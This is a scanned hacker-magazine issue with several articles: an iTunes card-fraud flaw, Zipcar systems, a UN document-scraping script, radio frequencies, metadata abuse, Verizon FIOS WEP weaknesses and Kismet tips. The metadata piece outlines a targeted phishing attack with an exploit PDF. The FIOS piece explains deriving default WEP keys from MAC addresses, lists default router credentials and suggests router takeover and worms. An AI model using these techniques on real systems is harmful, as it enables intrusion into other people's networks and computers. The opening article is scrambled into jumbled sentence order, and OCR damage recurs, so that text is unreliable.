.THE HACKER DIGEST . new bills started to come in from the iTunes store. I was able to add my new credit card to the account. Here's how to test this: Log yourself into iTunes on two separate computers. try downloading a song. I decided to test it myself. Even Apple seems unable to stop them. I was able to reach someone in the iTunes store who told me that there was no way that someone with a stored password would be able to make purchases once the password had been changed on my end. In the past. just to be safe. Assuming that. and no additional fraudulent purchases were made. so this ordeal hasn't cost me anything financially. there is absolutely no way to stop downloads from bring charged to your account. Immediately. On the other computer. over the past few days. You will always be able to download songs from the second computer. the thief would no longer be able to continue purchasing songs. I added my new credit card number to my account. and that my account was now secure. Again. but that I should have my credit card reissued again. on one of the computers. with the password changed. the answer from iTunes support was that these purchases must have been made before I changed my password. go to the account settings page and change your password. my credit card company reversed all the charges from iTunes. even though the password has been changed. Now. my laptop was stolen. and have the one-click purchase option turned on. Whoever had possession of the laptop was purchasing songs through the iTunes store. using a second computer. You will see that it downloads without a problem. Is there a person you’re aware of who is a known entity and has made a noteworthy accomplishment of some sort that would be recognized by the hacker community? Do you feel this individual would have something of interest to say about what it means to be a hacker? If so. even without entering the new password. Then. and make sure that you have the one click or click-to-buy option turned on. Apple is completely unwilling to recognize or fix.VOLUME 26
iTunes Stored Credit Card Vulnerability
by Brendan Griffiths
A little background: About three weeks ago. For a couple of weeks. After calling Apple's customer support line several times. I started to get bills from iTunes for songs I hadn't purchased. A day after the computer went missing. restarting. So here is the big security hole: once you are logged in to the iTunes store. both of which I did immediately. They suggested I cancel the credit card linked to my account and change my password. because I had enabled the one-click download feature. However. it has been an incredible hassle and waste of my time. this is a major security issue that.
Hacker Perspective is a regular column featuring the views of various luminaries known to the hacker community and oftentimes the mainstream as well. Not believing them. You can even try quitting iTunes. Thankfully. everything seemed fine. Download a song or two on both. we’ve featured commentaries from:
The Cheshire Catalyst Bruce Schneier Phiber Optik Barry Wels Nick Farr Bre Pettis Mitch Altman Rop Gonggrijp Bill Squire
We want this list to grow even bigger. Clearly. etc. for whatever reason. I was billed for a backlog of songs that had been purchased while my previous card was inactive. I immediately contacted iTunes support (which is only available by email and took more than 48 hours to respond). again for songs I never purchased.com with details. then let us know and we will try to entice them into writing the next Hacker Perspective! Email us at articles@2600.

after which there is a per-mile surcharge.) I asked him to lock the truck by tapping his Zipcard to the RFID Reader so I could then unlock it with my own card.with two enormous couches still in its bed. I lost my Zipcard.. In addition to the annual membership fee. apologizes. yes. (I expect to be charged some fees for service rep assistance and a replacement card. until you lock the car with your card. and then.) The fact that their reservations system communicated so quickly with my vehicle in a remote area tells me that whatever wireless protocol they’re using isn’t cellular. Happy car sharing!
70
. when booking for a 24-hour period. but the member before me hadn’t yet returned it. and it unlocks all its doors. but a win-win for Zipcar. I’m more interested in the hidden information infrastructure that makes it all possible. I went to pick up my reserved Zipcar. they reassigned me to another car ten feet away. but the rep directed me to the trunk. The hourly rate includes the cost of gas and mileage up to 180 miles. just as I pulled out my phone to report the tardiness. So he was charged for his reservation. too. plus $9 for my hour of driving. Another instance of over-the-air magic occurred when I arrived at my Toyota Matrix only to find it completely scratched.) Also. Yes! That was all I needed. depending on the car’s cool factor (Mini Coopers are most expensive) and gas mileage (Priuses are cheapest). where a friendly voice verified my identity (asking for name. WTF? The dude gets out. and it was getting late. I called Zipcar.50 to $10. explaining that “If they don’t know when I returned it. they cannot be outsmarted. I called 866-4ZIPCAR. He basically refused to “check out” of his reservation. and I said no. and address) and then -ka-chunk! -. Apparently. and missing a hubcap. To access the vehicle. I’ve made some inferences about how their systems work without resorting to hacking any of their hardware (i. so I just took the truck.THE HACKER DIGEST . In the area near the spare tire. deactivated the old one. I patiently waited for 15 minutes. after a few minutes of collecting my description of the damage. which ranges from $8. The car verifies that you have reserved it for this time. and. which are parked in designated spaces in urban areas. while their marketers promote the size of their fleet. there was a stack of new Zipcards. plus a $50 late fee. You see. (A $50 late fee discourages tardiness. These stories of “edge cases” should illuminate some of their systems’ inner workings. One time. DOB. and they confirmed that. I spotted the $50 “annual” fee on my credit card statement. So. Reservations may be for as little as one hour or for multiple days. in this case. then they won’t charge me the late fee. through the website or a stripped-down mobile interface.” I didn’t have time to argue at this point.VOLUME 26
Zipcar’s Information Infrastructure
by IntlOrange
Zipcar is the largest car-sharing company in the country. and. tethered to the steering column. I was locked out of my vehicle in rural Western Massachusetts. Zipcar is a great deal. it works like this: Customers pay an annual membership fee (around $50) in exchange for access to Zipcar vehicles. returned it an hour later. Late Driver was “on the clock” until I locked up at the end of my reservation. The keys are already in the car. and reservations can be made by phone or online.instantly unlocked the car.50 an hour. He asked if I’d reported that he was late yet. Cars must be reserved in advance (although it could be as little as one minute in advance). I called Zipcar later to tell them what happened. (I still had to pay for my hour. and asks me to help him unload the couches. damaging vehicles). which is about $70-$90.e. the black truck roared into its designated parking space -. An email to Zipcar elicited the response that it is their policy to re-charge the annual fee when a member moves to a different area. it’s much less expensive and far more convenient than regular car rentals when you only need a vehicle for short periods of time every so often. I chose one and read her the six digit code on it. which unlocked with a wave of my card. Mr. In short. but the last time I relocated (from San Francisco to Boston in June). dented. customers are charged an hourly rate for using the vehicles. (There’s a gas card in the visor that you can use to fill up when needed. Reluctant to do anything that could jeopardize my membership.) During another recent reservation. She linked that card to my account. the clock is still running on your name. officially starting my reservation. My normal annual membership cycle runs from December to November. he was running late and hadn’t been able to complete his move. a special all-day rate is used. so you’re all set. Zipcard number. you hold your RFID membership card over a sensor installed on the driver’s side of the windshield. I hope these stories have gotten you thinking about all the technology behind the scenes at Zipcar. The one part of Zipcar’s infrastructure that’s not so magical is their billing system. To those unfamiliar with Zipcar’s carsharing model. but the bill hasn’t come through yet. and locked it using my card. and I was back on the road like nothing had happened. Great. of course. which is unfortunate for me.

he became designated a “good” guy in 2006. Security Council transcripts have the document code S/PV. That means that if you click on a link to one of these documents from within the United Nations website. and to whom they are happy to transfer the associated unpopularity that comes from implementing that policy. which has been covered ad-nauseam by the paid-for newsstream. we think of the United Nations as a remote organization which puts representatives on the ground in the third world. I am not qualified to elaborate on these cases. In 1999. or the WTO) over which they have effective control. That was back when Qadhafi was a “bad” guy. England were raided by police in relation to a UN mandated financial sanctions regime. This regime was set up to “target entities associated with Al-Qaeda. doing the research that mysteriously has gone out of fashion just when. but if you put the URL directly into your browser. There is a theme in politics whereby governments intentionally launder somewhat questionable policies through a supranational organization (such as the EU. These documents are in PDF form. In the early years of this regime.1234 (the enumeration is from the first meeting of the Council on the 17 January 1946 in London. If you object to the UN. But back in 2006. it’s never been easier. Yet when that collapses. I mean questions that we should all be digging into in detail. turning them into a beggar to whom it is illegal to give any money to. there will be a great deal of unnecessary suffering and death. Both of these produce verbatim transcripts of their official meetings and tables of the votes by member nations on any issue. and you cannot link to them on-line because they are referrer blocked.THE HACKER DIGEST . and pals around with heads of state in the developed world. Suddenly. except to note that the individuals arrested were alleged to be associated with the Libyan Islamic Fighting Group. Nafta. the military junta who has just seized power in your own country probably doesn’t rate the maintenance of the capitol’s water supply high up on its list of priorities. you are missing the point. your URL bar in your browser appears to do a little dance and until it winds up with a completely different URL that works on your computer and on no
71
. a number of properties in my home city of Liverpool. what they’ve done is more complicated. such as whether there is going to be enough food to survive in the next decade–which is a scary prospect because history has only ever been written by the folks who got by. which leads to even greater sorrow.” It is implemented through a consolidated list of named individuals and organizations (posted on-line as a database dump) with whom it is punishable by law to have any unauthorized financial dealings.N. The point is that the human race–as densely populous on this planet as it is–desperately needs a world organization that is capable
of looking out for its long-term survival interests. in the spirit of the infamous “No Fly” lists. The alternative to supporting the existence of internationally respected civilian agencies who act in the human interest is to leave this job open to Economic Hit Men. General Assembly transcripts have the document code A/62/PV. And I don’t mean the fake corruption of the Oil-for-Food so-called scandal. But just because an organization is essential doesn’t mean it’s not politically corrupt and wide open to misuse by the stronger powers. or link to it from a blog. It is quite clearly an extra-judicial process. you’ll get an error. This group may have been supported by the British secret service MI6 during an assassination attempt against Colonel Moammar al-Qadhafi in 1996. meeting 100). For example. These interests are basic and technical.
by Julian Todd
Normally. Osama bin Laden and/or the Taliban. you will get to see it. as there is no right of legal defence before an impartial judge or recognizable due process of law. The maintenance of this list is purely a matter for the Security Council.100 (session 62. There are two main political bodies at the heart of the UN: the General Assembly and the Security Council. wherever located. England). In fact. the UN established an international financial sanctions regime through Security Council Resolution 1267. The UN is also needed to fill in for government incompetence around the world. so we don’t see the real picture. as you can see if you click on one of the links from the official UN webpage.VOLUME 26
The How and Why of Hacking the U. This is not necessarily the fault of the United Nations. it seemed only to take a fax from the US embassy containing the code-word Al-Qaeda or Taliban for someone’s entire finances to be frozen. thanks the Internet.

it is possible to extract text and produce structured HTML. mcookie.open(pdfurl) pdfdata = fin. Pre-1994.search(‘URL=([^”]*)’.group(1)) # the second to a URL containing a cookie mcookie = re.close() # write the PDF data to your disk fout = open(“S-PV-4701.urlopen(turl) cookielink = fin. the “Registration Convention”. I have constructed a site for hosting these parsed documents and linking to them by individual speech and paragraph on my server at www. That means.search(‘src=”(http://daccessdds. name matching. where the problem is invisible to the person who put them there. in the General Assembly.. the United Nations documents are generally scanned images.un.search(‘URL=([^”]*)’. so you can see all the votes by each country on each issue and tie them in with their Resolutions.write(pdfdata) fout.CookieJar() opener = urllib2.un.nsf/Get?Open&DS=S/PV. providing a high-level window into those entertaining Cold War years right up to the Cuban Missile Crisis.org/[^”]*)’.
import urllib2.4701&Lang=E” # this is the page on the UN website we pretend it was linked from referrerurl = “http://www. urlparse. For some reason.group(1)) # this temporary page contains two forwarding links fin = urllib2.undemocracy.VOLUME 26
one else’s by the use of internet cookies. which means that the meetings relating to the US invasion of Panama in 1989 and the excellent excuses given for it are all accessible. plenrefererforward) turl = urlparse.group(1)) # take the cookies from the cookie link cj = cookielib. there’s all manner of discussions that don’t fit with the narrative put out by the usual news-
72
.. the transcript documents post-1994 are text PDF. it is possible to unpick the process and successfully scrape a document from the UN’s servers to your own server using the following Python script:
Now.htm” req = urllib2.2601 (26 June 1985). cookielib # this is the URL for the document S/PV.urlopen(req) plenrefererforward = fin. mpdf.THE HACKER DIGEST . the meetings between numbers 687 (4 January 1955) and 1021 (15 October 1962) are also online. such as “World Television Day”. The transcripts of the Security Council meetings go back only as far as S-PV.add_header(‘Referer’.org/access. with a lot parsing work.Request(url) req. re.build_opener(urllib2.com.urljoin(turl.pdf”.read() fin.close() # you can’t download the pdf unless you give it the cookie fin = opener. cookielink) pdfurl = urlparse. More recently.urljoin(url.urljoin(turl.open(cookieurl) fin. Using this site it is possible to pursue interests in citizen journalism by referencing these documents from little-known Wikipedia articles. Then there’s a gap. “wb”) fout.close() # this gives a dummy page that forwards the browser to a temporary page mfore = re.read() fin. I have seen these “works-only-for-me” links posted onto many sites on the web. url) fin = urllib2. and correcting spelling mistakes.4701 in English url = “http://daccess-ods.un. mfore.close()
Nevertheless.close() # the first to the URL of the actual PDF page mpdf = re. and the “Optional Protocol to the Convention on the Rights of the Child on the Sale of Children.read() fin. Child Prostitution and Child
Pornography”.HTTPCookieProcessor(cj)) fin = opener. cookielink) cookieurl = urlparse.org/Docs/scres/2002/sc2002.

hot frequencies! • • • • • • • • • • • • •
French.org/
Holland. Just because the documents are not marked classified doesn’t mean they don’t contain real information or that nobody is paying attention to them. Chaos Radio Club of France (CRCF.de/
Germany. not only North Korea. Remember what happened to East Germany in 1990? The stories are everywhere on every issue.voila. satellites AMSAT.org/ (no longer online)
• • • • • •
channel 1 : 169.174 MHz FMN (Walkie-Talkie ALAN CT-145 (5 Watts) vs “Export”) *Only for testing crypto-voice and low-data link (RTTY)
USA.
Larsen’s websites
• •
http://14frs128. Where do we think technology comes from? This is not the 1980s.htm http://cryptome. radio hackers in VHF and UHF
49. Speaking of made-up problems. the original plan.990 FMN channel 4 : 170. that innocent era with its cold war games and the amazing story behind the bombing of Korean Flight 858.fr/ http://astronautique21.625 MHz FMN.rebelz. in both 2000 and 2007 there were day long debates on the floor of the General Assembly in which everyone agreed with a resolution entitled: “Peace.fr/
73
.900 FMN 444.875 FMN 156.5 FMN 154. hot.net/ ➥French-hacker-sued-by-an http://www.voila. 4 W FMN) and PMR 446 MHz (500 mW): Yaesu Vertex Standard VX-146) for local link.375 MHz Simplex FMN http://www. Chaos Computer Club d’Hambourg (CCCH) in UHF during HIP 97
Today.. while I carry on with what I can do from my distant home.550 FMN
Larsen (Vincent Plousey) busted by French secret service (DST). only members of CCC 145. ISS and the NOAA (Wxsat). (27 MHz CB: ALAN 42 Multi (1 W AM. Perhaps someone in New York could visit the Dag Hammarskjöld Library building at the United Nations Headquarters at the northeast corner of 42nd Street and 1st Avenue and get back to me with an explanation.site. Larsen uses legal “citizen band radios” to transmit.642.950 FMN channel 3 : 169. It is unclear what changed this policy around.000 MHz FMN* 169.har2009. If the contents were more widely known.com/ ➥archives/larsen/larsen. We’ve got bigger problems now than those made-up ones from an interesting. Larsen is very active in PMR 446.bugbrother.htm http://crcf. security and reunification on the Korean peninsula”. as outlined by the Secretary-General in document A/C. it would be a lot harder to fit the news-stream around policies that required enemy missiles to be sited in places with illogical targets for illogical reasons.transfert. as recorded in S/PV/2791.site ➥.875 MHz FMN 151. having been constructed by a nation with an incompetent government whose fund of natural born geeks are more than likely starving in the dark on a mountainside having had their family’s corn-field washed away by a series of floods than learning their trade through the vibrant hacker underground.ccc.” was to provide direct hyperlinks to the aforementioned documents on the Official Document Server.500 FMN 464. CUBESAT.info/ ➥larsen091200.THE HACKER DIGEST . Hack Tic in VHF during HIP 97 (possible HAR 2009?)
•
•
433.625 FMN 151.090 FMN https://www.
Listen t o R ad i o H a c k er s !
by CRCF
You have a radio scanner covering VHF and UHF? Perfect! You can listen to the discrete frequencies below. but obviously outdated past. and my emails to them go unanswered..5/56/12 from 20 November 2001 entitled “Simultaneous availability of parliamentary documentation in electronic form in the six official languages on the United Nations web site.000 FMN* 136 MHz .600 FMN (McDonalds hacking!) 156. April 2000
• • • •
http://www.VOLUME 26
stream.000 FMN 464. For example.930 MHz FMN for “volunteers” channel 2 : 169. ex-leader Larsen) in VHF during 1994-1999
158.070 FMN channel 5 : 170.000 FMN* 173.

hidden somewhere in this list of strings you’ll usually find the same information that I alluded to above. Image files include a number of EXIF tags that contain a wealth of information about the type and model of camera used to take the picture.doc’ will output just the creator data associated with the test.doc file. When you look at the properties of a PDF file. which will populate this field from your user settings). Tools like Metaviewer and MetadataAssistant can gather together all this information into a single location. For example ‘extract ➥ -p creator test. last edited date. you can also install a number of third party tools to make metadata searching easier. Good question. you’ll also be able to see the exact version of software used to create/edit the file. coming from the Greek word “meta. you’ll probably need to install a specific application to get at the really interesting data stored in image files.pdf for any strings matching the word adobe. provide information that can be very informative. the options for extracting metadata are a lot more flexible than they are under Windows. You can use the -p option to set a specific metadata field that you want to see. and which application was used for creating the file. For Windows users. if I’m feeling really lazy).
What is metadata?
Windows: There are a number of ways to view the metadata contained within files. you can use the ‘strings’ command to examine one or more files for human readable strings contained within the file. After all. you’ll come across a number of command line and GUI applications that will do a little more for you. For example ‘cat file. for example). you can get the libimageexiftool-perl module direct from your repository. As with Microsoft Office. Personally. you can get an installer from Phil Harvey’s website (see links below). is a rich source of information that is stored within the structure of a file when it’s saved. so to speak. With specific file types you’ll see a ‘Summary’ tab that will include some basic details. Command syntax couldn’t be easier: ‘extract’. that said. I’d start by looking at the extract tool. It seems simple. isn’t everything more flexible under Linux? . The thumbnail information can be
What about Image Files?
74
. path information. I use the Exiftool application written by Phil Harvey (sometimes with the ExifToolGUI.THE HACKER DIGEST . as this should offer what you need from a command line and should be easy to find in your package manager. Personally. Under Windows the easiest way to view simple metadata is to right-click on the file you’re interested in and select properties. and usually do.
How can you see the metadata?
Linux: Under Linux.VOLUME 26
Abusing Metadata
by ChrisJohnRiley
Metadata. as well as the usual creation information. You can fine tune this simple search function to look at multiple files. and isn’t usually automatically entered (unlike Microsoft Office. Running a quick search on your distributions software list should pop up two or three options. This should output a number of strings and hopefully the version of software used to create the file. Using Microsoft Office documents as an example. if the camera is fitted with one (like the iPhone. however. As with Windows. Looking at PDF files will also provide a wealth of information. The power of Linux.). most of which isn’t going to be particularly useful for you. However.pdf | strings | grep -i adobe’ will search file. In some versions of Microsoft Office. I’m glad you asked. If you’re on Linux. this won’t work for every type of file and won’t give you all the information you might want. This information can include details about the author of the document. Underneath this you’ll find the creation date. you should see some basic statistical information about the document (number of words etc. You can get basic text output from the extract tool. this tab should contain the version of software used to create the file. It can contain a host of potentially useful information to the average bad guy or generally curious type. If you want to go deeper into metadata you can pick-up a number of third party tools that will extract the information from documents for you. you’ll likely see a ‘PDF’ tab that contains specific information about the creation of the PDF document. as well as thumbnail information and even GPS data. and it is. or search for other strings very easily. date of creation.) At a basic level. Some file types will provide nothing more than a time/date stamp and others will want to tell you their life story. However. Image files can. This information will vary depending on the file type. This will give you a long output. is that you can take this output and search it for specific strings. Although. if you by search for ‘EXIF’ on Google. Unlike the document types we covered above. Information about the Author is optional here.” meaning about. as well as hopefully some information about the author and the name of company the software is registered to.

Taking it from another point of view. Within Word.xml > deleted.1. Using the exiftool you can easily export this data by typing ‘exiftool -b -ThumbnailImage image. Once expanded. clientside attack. Armed with the name of the author and the content of the documents. exposed on the internet. As you’re targeting a specific individual or group. no point in using outdated data. in the hope that my target is away). After all. Using the information I’ve gathered.*\ ➥(. then the thumbnail will represent the original picture and not the edited. The back and forth goes on until the final document is completed. Using various methods./word/document. including writers’ notes and changes. I’ll not rehash the contents of the story here. The final piece of information is the document creation date. Adobe Acrobat 8. I edit it to insert a client-side exploit. The revisionist tool was designed to do this automatically on entire directories. He wrote an article about data stored within Microsoft Office documents. A prime example of this is the research done by Michal Zalewski back in 2004. so that I can forward him a new revision of the document for consideration. I can see from the metadata I’ve extracted that the company is using Adobe Acrobat Professional 8. I’ll run you through the process. From the creation date I can see that they wrote the documents last month. so it’s best to check multiple files from various sources (website. If a thumbnail image isn’t re-created after editing. Not all files are going to contain useful data./word/ comments. Obviously. Collaboration is a big thing for companies like Microsoft. we all value our privacy and nobody likes to think that a document we’ve written will contain possibly sensitive information about us. I call the company reception (probably late evening or lunchtime. nothing too heavy. I regularly find metadata in files when performing penetration tests. it’s possible to view information on the revisions that took place within the document (if they’ve not been cleaned prior to publishing). emailed press releases. The article can still be read on his website. so the information I’ve extracted from the metadata is relatively current. though.THE HACKER DIGEST . This can obviously get a little long winded if you’re searching an entire website’s worth of data. This just means that we need to break out the trusty Linux toolbox and take a look.2 for Windows (this is listed in the metadata as the product used to create the PDF files).out’. This has been used more than once with embarrassing results. Microsoft quickly got the message and began cleaning metadata from the files it uploaded.xml file. we can take the . so your best bet is to check out the Exiftool documentation. as a penetration tester. Now it’s time to write him an email. cropped.*/\1/p’ docu ➥ment. However. the information for each revision of the document is stored unless it’s specifically stripped from the document. along with a (now) outdated tool called the revisionist that extracts the revision information.VOLUME 26
useful depending on the way the picture has been edited.com filetype:pdf). Google hacking is your friend here. this
Why is all this useful?
What else can you see?
75
. you’ll find the collaboration information in the . for one. Simply finding a few PDF and Word documents on a website could give me enough information to launch a focused. Comments can similarly be found by looking at the . You can easily find these in Linux using ‘sed -n -e ‘s/. I simply ask for the email address of the target. Following our example to the next stage. This information can be extracted and used to our advantage. It’s common in business to work in teams when creating specific types of documents. I can run the PDF files through strings/extract and isolate the information that I want. There are many more possibilities here. or touched up final version. it’s a simple case of writing a believable email that is convincing enough to get him to open my version of the PDF. deleted entries are surrounded by delText tags.*\)<\/w:delText>.jpg’. I won’t go into how to achieve this here. suffice it to say. For example. as we’re all more than capable of clicking a few links. there are a number of reasons. step by step. Why should you care about this information? Well. After gathering some files from the target company (possibly using a Google search such as site:target. time has moved on since the tool was first made and running it on more recent documents results in error. Maybe you can even skip this step if you can determine the email address based on other information gathered from the Internet. metadata is a treasure trove of useful information. don’t seem to have gotten that clue just yet.2 has a known flaw that can be exploited using malformed PDF files. Taking one of the PDF files I examined earlier.jpg > image_thumb. etc. I also find the full names of several authors who wrote documents for the website. it was a little embarassing for Microsoft to have the revision history of their publicly available documents.1. In order to see this information. Other companies. however. Search for “Cat Schwartz exif” or “Meredith Salenger exif” for more information (not safe for work).). Simple request. From here. You can see additions and deletions based on their XML tags. Using Office 2007 as an example.xml file. However. especially when it comes to the marketing team needing to make changes to public documents. as that’s not the point of this article.docx file and expand it using unzip (docx is a container and not just a document. you can open up the files in Word and select to review all revisions through the collaboration options. after all).

no doubt.” Once there.com
As usual. but I think it would be confusing to a normal user. to a normal
76
. then the third party offerings are probably where you’ll find the best options. If you’re looking to ensure that all of your files are metadata free. Changing from a WEP to WPA2 setting was easy enough for me. it’s time to sit back and wait for the exploit to run. but was surprised by the user interface. He said that he had never heard such a thing and couldn’t believe that Verizon would do that.sans.)”. like iScrub and 3BView. again. To enable WPA2. I quickly found the wireless settings. this attack would have been a lot harder to achieve. such as distros or similar. that do the same job. There are also a number of third party tools on offer.THE HACKER DIGEST . I’ve worked with many users in the past in a support role and it’s very easy to confuse them. metadata didn’t make this user vulnerable.sno. Adobe has also begun incorporating metadata removal into their latest versions. They might as well as leave it wide open. but there are enterprise solutions out there.queensu. you have to go to another section titled “Advanced Security Settings. and I was finally in a position to give back to the community. I opted to go with their highest package at the time. Of course.” I then told him that if someone knew what they were doing. WEP has long been known to have poor security1. In order to enable WPA. If they left it wide open then at least some people would realize that it was insecure and might enable a WPA2 or a WPA2/802. Of course. • • • Michal Zalewski (Revisionist) http://lcamtuf. as well as building a feature into Office 2007 to clean metadata from files. there are a number of options. He was only familiar with running their install program on a Windows OS. Plus. I told the tech that they were implementing an insecure protocol for wireless protection. I was amazed that they chose this as their default settings. For bulk cleaning. I opted to use the 15/15 because I’ve always leeched torrents. I asked him for the WiFi info and told him not to worry about it. you must first disable WEP under the menu “Basic Security Settings” which has a title/warning of “(We recommend using WEP because it encrypts your wireless traffic. you have to change it from “WEP (Recommended)” to “WPA2 (An enhanced revision of WPA providing stronger security settings)” which. online. I immediately signed up for their Internet service. During the install. What happens from here is up to you. I was a long time customer of Comcast High Speed Internet. I seed mostly various open source projects that are large in size. There would have been no specific target information and no idea which client-side exploit could work. I saw something of concern. While they are giving out WiFi routers to all FIOS customers and enabling “security. So to an end user. If you want to remove the metadata stored in your documents.phy.” they are using WEP.ca/ ➥~phil/exiftool
Can I remove metadata?
Resources
Verizon FIOS Wireless Insecurities
by phishphreek phishphreek@gmail.cx Larry Pesce (metadata the silent killer) http://www. It just made things easier for us to exploit.org/reading_ ➥room Phil Harvey (Exiftool) http://www. due to my subpar connections.x config. When I started to look over the info he provided. As soon as Verizon FIOS became available in my area. that’s what I immediately wanted to do. I could easily connect without his help. do little to protect you from all those documents you have saved on your servers. which was an impressive 15 Mbps/15 Mbps. this information is provided for educational purposes only. you’ll have to look beyond the desktop plugins. He was always vulnerable. Verizon has since come out with a much faster package of 50 Mbps/20 Mbps. With this done. the tech didn’t seem to know much more than how to hook up the standard connections. it may seem wrong to disable WEP. there will always be the odd user who forgets to clean the metadata before saving.VOLUME 26
shouldn’t be too hard to achieve. desktops and. They “took security very seriously. He had no idea how to connect my Linux box to the wireless router. He shrugged it off as though it wasn’t his problem and told me to call customer service.coredump. I got the default UID and PWD to change my security settings (UID: admin PWD: password1). The Microsoft solutions. they could easily break the WEP encryption in minutes. Both of these options will strip specific metadata from Microsoft Office files as you save them. although handy. Without the valuable metadata. Microsoft has released an add-in for Office XP/2003.

We already have a couple important pieces of information. right? But wait. http://www. in order to attach to one of these devices.VOLUME 26
user might seem wrong since WEP is “Recommended. A quick drive around the development reveals over 500 access points. is worse than the hosts directly on the network. Well. It might even be conceivable to write a wireless worm of sorts which uses the routers as a Kismet drone7 to identify neighbor Verizon FIOS routers and then break into them.torproject. http://www. because I knew better. After a short survey. I later decided to survey wireless connections my neighborhood.actiontec.1 by default. http://www. The whole point of this article is to bring attention to the gross insecurities of Verizon FIOS router default settings. We know that we can drop the first octet and keep the next two of the WLAN MAC address towards our 40 bit WEP key. If I walk the perimeter of my apartment. When I first moved in. If they were not smart enough to change from WEP to WPA2. which means that you can redirect just about any traffic you want (when clients are using the router as a DHCP server) pretty easily by setting host entries in the router or by redirecting to your own DNS server.” Nonetheless. None of them had changed their default settings and I helped them to better secure their connections using WPA2 and changing the default settings. in my opinion. you’ll be able to connect to the device easily. which. It is always 5 characters and is comprised of letters and numbers.kismetwireless. so it would be pretty simple to modify the source for your own needs. I changed from WEP to WPA2 with the maximum length random shared key. it gets better. It’s pretty easy to find a Verizon FIOS wireless connection. you can simply listen passively to this traffic and select the Verizon FIOS wireless access point of your choice.cs. I live in a rather large apartment complex. The specific model that I have is a MI424WR3.isaac. it is! That’s right. Seeing as many people use these devices as a firewall for their home computers. just like a cheesy infomercial. I’ve only tried to access a couple of them (with my neighbor’s permission of course) and I’ve been able to get right on. that gives me 16 possible combinations for each octet or ~16^3=4096. The OUI for the models in my area are 00:1F:90 and 00:18:01. it’s also easier to gain remote access to the computers because security is more lax behind a so-called firewall. The complex is marketed as “Luxury” and is more upscale than most other complexes in my area. Not to mention that it’s easy to modify the DNS server that the router is using. So. http://www.com/ 7. I’m happy to see that most are at least using WEP. uploading custom firmwares or settings and creating a botnet of very highbandwidth endpoints distributing their firmware via ftp. Just drop the first octet of the WAN MAC.html 2.com/ 3. It’s simple to modify the firewall to allow remote administration. As it turns out they use the last 40 bits of the WAN MAC address of the router as the default WEP key! They put it right on the router with the SSID information for consumer convenience. we should only need the WEP key.php?pid=41 4.actiontec. or even running TOR8 endpoints! The possibilities are vast. Maybe more could be found by searching ieee.edu ➥/isaac/wep-faq. http://www. http://opensource.org/
Resources
77
. The SSID is normally random looking and stands out in the list. An attacker can gain complete control of the router. What do we have here? It looks like a client with a MAC that starts with the same three octets of the device’s WLAN MAC! Could that be the WAN MAC address? Yep. Firing up Kismet from my office on my laptop reveals over 75 wireless routers. They tend to use pretty decent routers from Actiontec2.com/ 6.THE HACKER DIGEST . That means that if the device starts with 00:1F:90.dd-wrt. A lot of people have WiFi and other high tech devices. torrent. Configuring dynamic DNS features will increase the likelihood of finding and controlling of these devices. recompile and then load. Increasingly.net/ 5. tftp.168. http://www. The Actiontec MI424WR firmware is GPL’d5. you have the WEP key. Then use the “c” option on the AP to view the clients. You don’t have to be in the immediate proximity after initial compromise of the device.com/ ➥products/product. Two years later.berkeley. I’ve always seen these devices on 192. I’ve been seeing people deploy WPA2. It should be pretty easy to brute force that through a script. over 125 access points show up. These insecurities are not insignificant. More than likely.
1. Let’s not also forget all the fun that could be had by modifying routing tables or loading a custom firmware such as DD-WRT6. there were not nearly as many (about half) and many of them were not protected at all. then you still have a good chance of logging into the router with the default UID and PWD above. since the octets are in hex.org.com/wiki/ ➥index.php/Kismet_Server/Drone 8. http://www. Enter Kismet4.1.dd-wrt.actiontec. the WEP key will ALWAYS start with 1F90 and I’ve only got to figure out for myself the last three octets.

} /Encryption/ { ➥ if (ssid) printf $0..wigle. however. or offices. Unfortunately. this info is available on http://www. it’s harder to separate statistics about home networks from networks used for inventory control. the tide is turning.net worldwide. 40 percent use WEP. I decided instead of writing a full XML parser to process log file lines. Slowly. }. within 50. Besides. “seven years of wireless fun” sounds better than “a bunch of years. /: ➥ Beacon/ { ssid=1. foolish.VOLUME 26
Transmissions
by Dragorn
S even Year s o f Wir eless Fu n
The stars (or in this case. only five percent of the total advertise WPA2-AES).nettxt | awk ‘/^ BSSID/ { ➥ ssid=0. but that would preclude bringing us to. and some wireless stuff. printf “%s “. }. $3.’ | grep Encryption ➥ | sort | uniq | grep WEP | wc -l
This gives us a least-possible-effort mechanism for taking a directory full of logs.000 networks collected randomly over the course of six months across several major cities. Being. approximately 30 percent of networks are still wide open. not a whole lot. This is up from a few years ago. and count them. Using WEP on a home network is still. and this summer has the first release of a completely rewritten Kismet which has been under development for five-plus years. and the remainder use some form of WPA (significantly leaning towards WPATKIP. Stupid Kismet Trick #1: Quick-and-dirty processing of log files. of course. really. }. but using it on a network with any sort of business
78
. /Channel/ ➥ { printf “\n”. considering how easy it is to break. access points) align: The summer issue for H2K2 had one of the first articles about Kismet (and my first article for 2600).” So what’s changed since 2002? In many ways.. obviously the better solution was to spend a frantic five minutes with the AWK manual and toss together some ugly script:
cat *. when 20 percent encryption was a promising statistic. In retrospect.THE HACKER DIGEST . that the average home user hasn’t listened all that well. most likely. point-of-sale. squash the network plaintext output format into singleline records. absolutely on top of deadlines and never rushing things.. Absolutely shocking.

Once attached. raise an alert that WEP has been cracked. Kismet can automatically attempt to crack the WEP key of a protected network when enough data has been seen. and even defining new capture types and log files. / ➥ TIME/ { if (CHN != 0) { printf(“[“). Stupid Kismet Trick #2: Getting information out of Kismet real-time. such as defining new alerts.org and implements a completely new capture type. network decode. Server and client plugins define a new network protocol for DECT phone records and display it integrated in the UI.11. and keep running through most errors that would have killed previous releases. Kismet bundles two plugins of its own. ➥} }. data travels the “packet chain” where any type of arbitrary information can be attached. Kismet now supports plugins which can do nearly anything within the framework that Kismet does already. With the PTW plugin loaded. Kismet-PTW and KismetSpectools.networks’ | nc localhost ➥ 2501 | awk ‘BEGIN { CHN = 0. While still in Curses text mode (hey. Development continues. a plugin receives all data which was attached to the packet in previous stages (such as decrypted WEP data. done
application is begging for an intrusion. the changes since the early versions are significant. logging. automatically detect the supported channels on a capture interface. x++) { pr ➥ intf(“{\”id\”:%s. There’s a lot of possibilities. Plugins can attach anywhere along the chain: New packet data. and so on. Kismet sports a completely redone UI. Most significantly. For Kismet.THE HACKER DIGEST . if ➥ (x < (CHN-1)) printf(“. which implement a passive AircrackPTW and integrate with the Spectools spectrum
Which is the quick and dirty way of converting the Kismet channel usage report (in this case. however. GPS location.
79
